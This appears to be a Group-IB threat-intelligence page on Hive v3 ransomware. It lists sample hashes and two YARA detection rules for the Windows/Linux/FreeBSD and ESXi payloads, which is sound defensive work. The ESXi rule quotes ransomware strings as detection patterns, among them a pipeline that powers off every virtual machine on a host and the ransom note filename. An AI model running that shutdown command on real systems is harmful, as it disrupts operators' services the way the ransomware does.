            34215cad33becc30bf2c994c2b50fd3938d6e91fdeb9dc189eb97cd036f2a223

            46d100b79524a1b3dfa9a98625acc0329b4b948859a397af94a97c394c7d9f74

            4a7df7a500d498342804749f3a8e7c3e8711a1fcc3d8a785579d2b23d2c21686

            61fd23a73f975b2527812d14fd32ae0b929f42be3335f06401b5d324090ec9b9

            72999cded357edf7dd8aed41942a1ea33e96004b8ab0bbc39adf86690405d16f

            7718a4f685d17423d7b8736fb1762fcbca92d2a0918fdd29b4118ac920aef517

            83f4174bf4f0bd2c6d411cf81293ccb62ce69345246938bf28a77f143ac4af40

            9335341e54698e2a33355c0594d622828c1634557b69453b5d856211c4aa461b

            98598eeb0a57f8c2d50a8009f060249fc45b00f564c9411e5255084e59168f73

            9868fd95b89af8a070c45e2533bd9626d9b36f5f10419086bba5f6b337dd79a8

            98a48551e429fadc550cf8454f09c01e233aebf176bd141db57305e0ba2d0d28

            ad1bcde48e755669187c9e170443d95585cb26db1f619c7f9dc57d32974471c1

            c90ea27b7ea59563bb221dc694dd9cbb37994b656f9509d28413c454d0046460

            cc575842398e2fec84efb9de29b230280120709aead807edc807a62072f6194d

            bc04af5bfcd57465d938e33e13974a299062e4732298dc687baa27270a5ba60f

            d5adeef0250358c54e74b012f4f7ad9f7765b2919747116870e54ff3b6340442

            de03a9fcf26d9f446a362de7302e151eb3f4a90544f034a054684cc317c44742

            df7003b2f8d330b16cea1b682edddd1d85e56806a276f432e5f09091b4877a7d

            efccbae3957f57bf31954261d1b13d7e985378e1ff0038cfcc2802b5a94cfa4d

            f172f51cdb08fc31d4cc213aba90a2581f0954f4fc99a3515feead06c3257ca2

            f682a4a38f7eba04b3d87a4b31d8a745f3aa6d04201ab9c3315e6c09fdc75229

            f7ac5830a672c6a4722050919384daaa985870d59bbbd757197de5207099cef5

            fb91cffedd7d555ca0660b992a43367817ed6bb2d202e1e9218346114d0d9bc3

            ff3198e720eb5f3ed07c23cac434698d63e2a08647864a9d539ecb6af7aa3ffa
            YARA rules
            /*
            Hive ransomware
            */
            
            
            rule Hive_v3
            {
                meta:
                    author = "Andrey Zhdanov"
                    company = "Group-IB"
                    family = "ransomware.hive"
                    description = "Hive v3 ransomware Windows/Linux/FreeBSD payload"
                    severity = 10
                    score = 100
            
                strings:
                    $h0 = { B? 03 52 DA 8D [6-12] 69 ?? 00 70 0E 00 [14-20]
                            8D ?? 00 90 01 00 }
                    $h1 = { B? 37 48 60 80 [4-12] 69 ?? 00 F4 0F 00 [2-10]
                            8D ?? 00 0C 00 00 }
                    $h2 = { B? 3E 0A D7 A3 [2-6] C1 E? ( 0F | 2F 4?)
                            69 ?? 00 90 01 00 }
            
                condition:
                    (((uint16(0) == 0x5A4D) and (uint32(uint32(0x3C)) == 0x00004550)) or
                     (uint32(0) == 0x464C457F)) and
                    (
                        (2 of ($h*))
                    )
            }
            
            
            rule Hive_ESXi_v3
            {
                meta:
                    author = "Andrey Zhdanov"
                    company = "Group-IB"
                    family = "ransomware.hive.esxi"
                    description = "Hive v3 ransomware ESXI payload"
                    severity = 10
                    score = 100
            
                strings:
                    $h0 = { 48 69 ?? B5 B4 1B 01 48 C1 E? 20 69 ?? 00 70 0E 00 29 ?? }
                    $h1 = { 48 69 ?? 25 30 40 00 48 C1 E? 20 69 ?? 00 F4 0F 00 29 ?? }
            
                    $a0 = "\\.(vm|vs)\\w+$\x00" ascii
                    $a1 = "vim-cmd vmsvc/getallvms | grep -o -E '^[0-9]+' | xargs -r -n 1 vim-cmd vmsvc/power.off" ascii
            
                    $b0 = "\x00%s.key.%s\x00" ascii
                    $b1 = "\x00! export %s" ascii
                    $b2 = "\x00+ export %s" ascii
                    $b3 = "HOW_TO_DECRYPT.txt\x00" ascii
                    $b4 = "\x00+notify /etc/motd\x00" ascii
                    $b5 = "\x00+notify %s" ascii
                    $b6 = "\x00+ prenotify %s" ascii
                    $b7 = "\x00Stopping VMs\x00" ascii
            
                condition:
                    (uint32(0) == 0x464C457F) and
                    (
                        (2 of ($h*)) or
                        ((1 of ($a*)) and (2 of ($b*)))
                    )
            }
            1. The material was prepared by Group-IB specialists solely for research purposes in order to minimize the risk of further use of methods and techniques of committing illegal actions and their timely prevention.

            2. The conclusions do not represent the official position of competent authorities, including law enforcement agencies, do not contain direct accusations of committing crimes or other unlawful actions, and are analytical and informative in nature.
            Try Group-IB Threat Intelligence & Attribution right now
            Optimize strategic, operational and tactical decision making with best-in-class threat intelligence